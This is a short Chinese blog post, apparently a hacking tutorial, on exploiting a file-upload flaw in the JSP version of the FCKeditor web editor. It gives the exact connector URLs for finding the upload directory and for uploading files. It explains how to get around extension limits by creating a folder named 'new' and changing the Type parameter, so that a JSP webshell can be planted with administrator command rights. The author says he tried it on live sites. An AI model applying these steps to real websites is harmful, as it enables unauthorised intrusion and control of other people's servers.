文/Fnod

昨试了试那个新报的Fckeditor jsp版的漏洞,还是有一些网站存在这个漏洞的,不过不知道这个漏洞针对哪些Fckeditor版本。

Fckeditor jsp版漏洞利用方法:

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F

用这个地址查找上传图片的路径,存在漏洞的话应该返回一个xml文件,如图

1

注意红框的地方,是上传后图片存放的地址。

然后用

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector

这个地址上传jsp文件,如果网站对上传文件的后缀作了限制,那么就新建一个名字为new的文件夹,修改上面url中的Type=Image为Type=new,把文件上传到这个文件夹,这个文件夹一般就不会对文件后缀作限制了。如图:
2

如果一切正常的话,利用这个Fckeditor 的漏洞所获得的jsp webshell应该有cmd管理员权限。